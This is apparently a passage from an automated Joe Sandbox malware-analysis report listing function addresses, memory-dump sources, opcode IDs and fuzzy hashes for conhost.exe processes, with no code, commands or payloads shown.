Instruction Fuzzy Hash: 20F0656160E7C54FD71ADA3448694547FA0EF6720174A42EEC045CF1A3EA2D8C89C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE77B09 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BE77B26

Memory Dump Source

Source File: 0000001F.00000002.2004958819.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9be70000_conhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 51cee2c22b99d91fb5646a856d7910c721de59dda27a836ad1073225c2dc1211
Instruction ID: 149e324e060da99cd0c7db4ecb73e527338ecaa78d33e469d24673869007b1da
Opcode Fuzzy Hash: 51cee2c22b99d91fb5646a856d7910c721de59dda27a836ad1073225c2dc1211
Instruction Fuzzy Hash: D3E09A6290F3D44FCB06AB3488A98043FA0EE6B20078B41EEC185CF1B3E62D984AC701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE78519 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BE78536

Memory Dump Source

Source File: 0000001F.00000002.2004958819.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9be70000_conhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 3130e0f79dd28ade48183e26c5cea7ac33477ee5e2e7c5dcb3f6a9271b563749
Instruction ID: 071177bac831a4d9371cc7622986eb5d479b2a767152df27fd8161885de88d9b
Opcode Fuzzy Hash: 3130e0f79dd28ade48183e26c5cea7ac33477ee5e2e7c5dcb3f6a9271b563749
Instruction Fuzzy Hash: 82E0127154E3D44FC716DB74886A8457F70DE6721078A41DEC045CF1B3E61D8849C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE74126 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2004958819.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9be70000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94878f04987c3fa3ab701dad926d87db970cbb7a195d05c74bf8f51d24e33acf
Instruction ID: 36fd4325dc51dbf4ac00d7ebe6f8344833b3c08ca6e2034cbc1c2171e09ee8e5
Opcode Fuzzy Hash: 94878f04987c3fa3ab701dad926d87db970cbb7a195d05c74bf8f51d24e33acf
Instruction Fuzzy Hash: F3518921A0EA8E4FE75AA76858A12A87BB1FF55300F0541FFD44DC71E3EE196D458342

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD08D0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c0962a37f3c310f6ec656114faa546af0316a67f34a985c31c49b1fbd474cf9
Instruction ID: b2ff5fecbd4184421f411da7c807f42cc26af5565fc24b44c04d27808f8b9807
Opcode Fuzzy Hash: 8c0962a37f3c310f6ec656114faa546af0316a67f34a985c31c49b1fbd474cf9
Instruction Fuzzy Hash: 36412A22B0D5590EE714F7ACA4A56F97781DF9533AB0403BBE40ECB1EBDD186941C285

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE7515B Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2004958819.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9be70000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61496b5cc3ad151e1701d6aa14da133a5283274b0f46e3d876cb657b0ad73c9
Instruction ID: 2a1abb58e4e1ecf2b3604fa3100be6db49872b81539ead73611dff481ec5beb5
Opcode Fuzzy Hash: e61496b5cc3ad151e1701d6aa14da133a5283274b0f46e3d876cb657b0ad73c9
Instruction Fuzzy Hash: C6419121B19D1D4FE6A8FB5884BA6B473D6EF98324F0101BAE40EC32E2DE297D418741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0998 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f78df94062e9d5e583adaeaaa67e999890884ad8a92bbc80d153c21ca7969adc
Instruction ID: ef7963d2abd4071da98cd87a22dbd23fc93888bcddab9fab6e5ff6ed89caa4bc
Opcode Fuzzy Hash: f78df94062e9d5e583adaeaaa67e999890884ad8a92bbc80d153c21ca7969adc
Instruction Fuzzy Hash: E1414620B1E94E0FE798B768846A6797AC6EFD9325B0503BAE00DC32E7DD58AC018245

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD1171 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0c470a81e03262f8220bcb5ac97f64f4a03e5da7e721f7b856c6a3bbfd27cd
Instruction ID: 390f9e0763726030c4267e53565311123d2111abd54936d388c6860ff0ef94e9
Opcode Fuzzy Hash: 5e0c470a81e03262f8220bcb5ac97f64f4a03e5da7e721f7b856c6a3bbfd27cd
Instruction Fuzzy Hash: 9131B731A0D68E8FDB46EB74C8649A97BF0EF66300B0502FFD009D71E2DA68A945C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc21bd54455b1989a59ecdba837a9d2f26db1c2eb39742ca2bae60fc879053a
Instruction ID: f2a2794e28946d9f4889c2ea5fccf69c59b89e6e3f9c2e3b118a296f657c7738
Opcode Fuzzy Hash: fcc21bd54455b1989a59ecdba837a9d2f26db1c2eb39742ca2bae60fc879053a
Instruction Fuzzy Hash: FD210736B0E24D8BE732A7B898710EC3B60DF92326F5542B7D0588A1E3D9782646C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD5D44 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8870902a0ab06b481f608358805fc44d1e713d0d45febc9e8570eb1fc95b96e5
Instruction ID: 0e2fdfd80f96f07b6525b3e03f8d6f35274b7641ce847c5265375013dac86b3d
Opcode Fuzzy Hash: 8870902a0ab06b481f608358805fc44d1e713d0d45febc9e8570eb1fc95b96e5
Instruction Fuzzy Hash: 22213D3090951D8FDBA8DB04C899BB873E1FB98301F5081A9D45ED32A1DE746AC5CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD3F9C Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd10f86b0dcaa8dbe3252d0fcaaddb3f9848e7b2b1a8e60307bf8b48a8055bf5
Instruction ID: 99fc727f5809c20022c5143974a5b662124d8ae64870c7cbd925aaf358aba740
Opcode Fuzzy Hash: dd10f86b0dcaa8dbe3252d0fcaaddb3f9848e7b2b1a8e60307bf8b48a8055bf5
Instruction Fuzzy Hash: 47113021F0A90D4FFBB4E7AC847867812D2DFE9341F0642B5E44EC72B2DCA8AD418704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91b8981d4d43cbb120b351bad9c6b310eb681987827b089b36a18d632c1a4cd7
Instruction ID: 8f62b4c4cd749aab70a246532ce7d75fd7bfe58e6102933775d2639a10b3050c
Opcode Fuzzy Hash: 91b8981d4d43cbb120b351bad9c6b310eb681987827b089b36a18d632c1a4cd7
Instruction Fuzzy Hash: BA11C635B0E64D8FE722DBA888711DD7FB0EF92611F5642B3D044DB2A2D5782646C784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD65B6 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672ae1d5c8074dea600c76b769b616f9454fa70a7b76c02c64fbfcc8e0d707ad
Instruction ID: 1536710cea40acc121b062a96bd471729eed377de111fd71f29f98c01ef7645b
Opcode Fuzzy Hash: 672ae1d5c8074dea600c76b769b616f9454fa70a7b76c02c64fbfcc8e0d707ad
Instruction Fuzzy Hash: AE119120E0D50D4EE7B8A768986A6B87391EF85700F1143F9D84DD32F2ED786A818681

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d26b19f2a075cbdd3ed36eb22159118b6a1aef0a206a5a0d4a20ee83c9db2152
Instruction ID: 53df1b0c31fc880efd38170d42cba5b69d5e3f1741431b047643979dc9a04de0
Opcode Fuzzy Hash: d26b19f2a075cbdd3ed36eb22159118b6a1aef0a206a5a0d4a20ee83c9db2152
Instruction Fuzzy Hash: B501E131A0E28C8FE722DBA888600DD7FB0EF92611F4642B3D044DB2A2D9382649C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4edb7b58a8c56a92967d30940b8cc8102bee9d5a339684d2ac5020e46eb1a3eb
Instruction ID: 7952724f2b8b48012e1202d05659577e7662159148fc6f9a41dff49d43a12d58
Opcode Fuzzy Hash: 4edb7b58a8c56a92967d30940b8cc8102bee9d5a339684d2ac5020e46eb1a3eb
Instruction Fuzzy Hash: 4901D231A0E28C8FD722DBA4C8600DC7FB0EF82711F5542E7D054DB2A2D9382645C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79cb7988cf030ed3e5364ea27469418f358620c27b040a7f919a500c37783f84
Instruction ID: 8fbae49910eb207a8093bd9308f5f7a20f43bdf2a22a78d1e630603e17e24f3b
Opcode Fuzzy Hash: 79cb7988cf030ed3e5364ea27469418f358620c27b040a7f919a500c37783f84
Instruction Fuzzy Hash: BF01DF30E0E28D9FE722DBA488A40DC7FB0EF52705F5542E3D054DB2A2D9782A44C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD6685 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3845596c4327085e7b812ed148a093c9f00aa9766b84abd82ff29e7f96efc8
Instruction ID: e84d98a49525c9a2b907fe503ee6592a4656dab6634f305d6c5e0160d340580f
Opcode Fuzzy Hash: dd3845596c4327085e7b812ed148a093c9f00aa9766b84abd82ff29e7f96efc8
Instruction Fuzzy Hash: EC013630A4941E8EEB78A798D8796F873A1FF94700F1102F9D84DD31B2DE7C6AC18A05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE75569 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2004958819.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9be70000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c70f8c11361c35526419e938a59152cdcbded938ea84e87f6ab99ed33e2a2a
Instruction ID: 39b07a811dae77b798772b331e4b24d6b57a686e1b5e8f1640ae33e77d7f795d
Opcode Fuzzy Hash: c0c70f8c11361c35526419e938a59152cdcbded938ea84e87f6ab99ed33e2a2a
Instruction Fuzzy Hash: 33F0E521B09F880FD729A62D48A8065BFE2DB7A51134A03EFC046C76B3ED59EC898741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE787C9 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2004958819.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9be70000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8160c9524af6ee290c6fe3880054138aced61e57d6a7f7104b261d61440ddf0d
Instruction ID: e887aa229f1db16f06fcba52534d332a3e3e9f29b3005256638923f159e16688
Opcode Fuzzy Hash: 8160c9524af6ee290c6fe3880054138aced61e57d6a7f7104b261d61440ddf0d
Instruction Fuzzy Hash: 62E0653194B6C84FCB165A3188A58943F64EF5621074A41EAC04ACF5A3DA1A9D59C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE74899 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2004958819.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9be70000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fce342e236abbfa205bc6e014b2dbe38da0657a7a748d4e401421ada968263e
Instruction ID: dc28e3f1bb15f20a534abc599296b291c1e3fb1fbce6d6ff58ead56157eb60f7
Opcode Fuzzy Hash: 2fce342e236abbfa205bc6e014b2dbe38da0657a7a748d4e401421ada968263e
Instruction Fuzzy Hash: FBE01A2160E7848FC70A973888699503FB1EF6B21178A00DBD045CB1B3D619DC48C712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0B95 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04d912cce1882ab70d92727893cd92ef9cb98564b3ceceef573e0c620fa50dcd
Instruction ID: fb7323db53e0fa424b157b509d31d69b64aff1afd0f60ee45a802cb3a4debf09
Opcode Fuzzy Hash: 04d912cce1882ab70d92727893cd92ef9cb98564b3ceceef573e0c620fa50dcd
Instruction Fuzzy Hash: C7D0A73021994E4FCA44B778C8594247BA0FB4F210BC510E5E048C7562C54849558704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3e88ead1a5968ade0eab6eeff9c87bbbb2a8a6dba60173493ab4d5c8c8aeec
Instruction ID: d06fbf94bb731de192650f643f02137e807730e3259cbb780f4cb7f0e8efbf47
Opcode Fuzzy Hash: aa3e88ead1a5968ade0eab6eeff9c87bbbb2a8a6dba60173493ab4d5c8c8aeec
Instruction Fuzzy Hash: 5AC08C05F0B40F00F43133EE143A0ACB1009BC4B10FD30332D00C800E19CDD22C6824E

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD12B0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72a1dd12a1fa5ad6107b0b1f5d18ee6a3dff9ded8a12d14089a41ed64f2f248
Instruction ID: 1cfa60ba56c93d45d6dd438935d059041383b86c91ad430ff2fcff428767e40e
Opcode Fuzzy Hash: e72a1dd12a1fa5ad6107b0b1f5d18ee6a3dff9ded8a12d14089a41ed64f2f248
Instruction Fuzzy Hash: B2C08C3051580C8FC908EB29C88880433A0FB49318BC20090E008C7170D259DDC0C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74f9ae3dc107e225bd3989dbdbb68dc79b92d57736b24654e32bc5322a855044
Instruction ID: 0afa7280464fc0c13c5f6561907aba84ac27559c8a9c4c95ca43d1610ff11da3
Opcode Fuzzy Hash: 74f9ae3dc107e225bd3989dbdbb68dc79b92d57736b24654e32bc5322a855044
Instruction Fuzzy Hash: 0DB01200D5740F00E43433FA086A06D70409BC4200FC20270D40C80095DCCD1295034A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE71A60 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2004958819.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9be70000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbfe5d81f90781dc7d9b5fae65bc7939a2d3dbb744eb94bb0449b0e7f7c07f4f
Instruction ID: 564a1136e998c37af149ce91926d0e8189137ba0216dfcedb8e1ab03f47fcc8d
Opcode Fuzzy Hash: bbfe5d81f90781dc7d9b5fae65bc7939a2d3dbb744eb94bb0449b0e7f7c07f4f
Instruction Fuzzy Hash: 33A00204D9780E41DC9831FA1ED70947494AB89914FC61360E8098119BEC8F1BE94693

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD25F3 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd5382d58ee3f1554fd1ae4c018962395e7343b6992d843b74c670da6b60efd0
Instruction ID: d6de5c6801b9cde4e847a3e5dba6eae8cb2b92bf19b1206b4b13ac1a61602954
Opcode Fuzzy Hash: cd5382d58ee3f1554fd1ae4c018962395e7343b6992d843b74c670da6b60efd0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9BAD09B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD9BAD0B3E
!k9, xrefs: 00007FFD9BAD0B4E
"s9, xrefs: 00007FFD9BAD0B46
c9, xrefs: 00007FFD9BAD0B56

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 291e03f9bc9e3e52b2cec524cbc6017d513728517531b2348642dbfc5493c9bd
Instruction ID: a5484833775d37985287900e2c70fab3096ea451742b4626fe866254e0005a9c
Opcode Fuzzy Hash: 291e03f9bc9e3e52b2cec524cbc6017d513728517531b2348642dbfc5493c9bd
Instruction Fuzzy Hash: C641AF02B0952605E23A73FD78228FC6B449FA937FB4843B7F45E8D0EB4D086086C2E5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: conhost.exePID: 7200, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9BAC0D48 Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FFD9BAC0DF3

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: 350e940222e1f37398423276baa01275d79ff1c7197a6b9b63f86670ef7e9e13
Instruction ID: 81a894a18108203d36d66d2c4878cb82891d53ffa5045329bd00fb4f1e8c58e6
Opcode Fuzzy Hash: 350e940222e1f37398423276baa01275d79ff1c7197a6b9b63f86670ef7e9e13
Instruction Fuzzy Hash: 5E81D171A19A8D8FE7999B6C88657F97FE0FB5A311F0102BED049C72E2CBB814118740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC08D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22d594ee461aa0732793e7bc9662f77bcc771315bd30009fe8abcd16eb3d3483
Instruction ID: 61dd5fa3db96f1b55ba1868ef0a2801a031743f572843b63300767a230b44821
Opcode Fuzzy Hash: 22d594ee461aa0732793e7bc9662f77bcc771315bd30009fe8abcd16eb3d3483
Instruction Fuzzy Hash: 84412822B0D5590EE718F7BCA4A56F97780DF5933AB0802FBE44ECB1EBDD1869418285

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0998 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aceba8be4d6a77e70c2d6afd19fa80f8c3804eb1c9eb3e78e32edddbe69fc48
Instruction ID: 1235c94569c8c47c290c4dce9bbb531ffd5b825adbd4b846f03ed1f129df30cd
Opcode Fuzzy Hash: 1aceba8be4d6a77e70c2d6afd19fa80f8c3804eb1c9eb3e78e32edddbe69fc48
Instruction Fuzzy Hash: D8216B21B1D95E0FE798B76C946A67937C2DF99321F0001BDE40EC32EADD54AC418285

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC1171 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb0ab3ada8456154f2adf9ba44580e3377b0515cd414996600480a2c992bf1cf
Instruction ID: 3e7537d3ae960f4be6f059b38650a1e06d09f8233495c275e86c5dd806c7b5c8
Opcode Fuzzy Hash: bb0ab3ada8456154f2adf9ba44580e3377b0515cd414996600480a2c992bf1cf
Instruction Fuzzy Hash: 2331A631A0D68E8FDB56EB64C8649B97BF0EF26300B0945FFC009D71E2DE689945C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2782601e244d128e5964ef0954e96bbb659fac8d2d3378a683b758cde9bde9a
Instruction ID: d1d73c1819f92ec3ba6f4dc6b279437f6551c67f9b2f1fdad36accddba140388
Opcode Fuzzy Hash: e2782601e244d128e5964ef0954e96bbb659fac8d2d3378a683b758cde9bde9a
Instruction Fuzzy Hash: F621F626B0E24D8BE731B7A898610FC7B60DF52725F1542F3D0588B1D3D97826468785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC5D44 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210ff1c11d38c06957269ac72b377379943b2eb27bee395467d9b19073307b7f
Instruction ID: 62945201293d034a6c2a9e747ab85027480132c20b3a3bf56ab10da4f221924f
Opcode Fuzzy Hash: 210ff1c11d38c06957269ac72b377379943b2eb27bee395467d9b19073307b7f
Instruction Fuzzy Hash: 6221303090961D8FDBA9EB04C899BB873E1FB58301F5045A9E44ED32A1DE746AC5CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC3F9C Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d9d3332a2d1cd41598563161ba39a3ab0954f0b9786defbccb292d80e08eaaf
Instruction ID: ae6cced9857a4733a48293a98eee2febe21a447ff9bf7e14d0e557cc011dd225
Opcode Fuzzy Hash: 7d9d3332a2d1cd41598563161ba39a3ab0954f0b9786defbccb292d80e08eaaf
Instruction Fuzzy Hash: F9118221F0A90D8FFAF4FBAC846967812D2DFA4300F0645B5D04EC32F2DCA8AD014704

Uniqueness

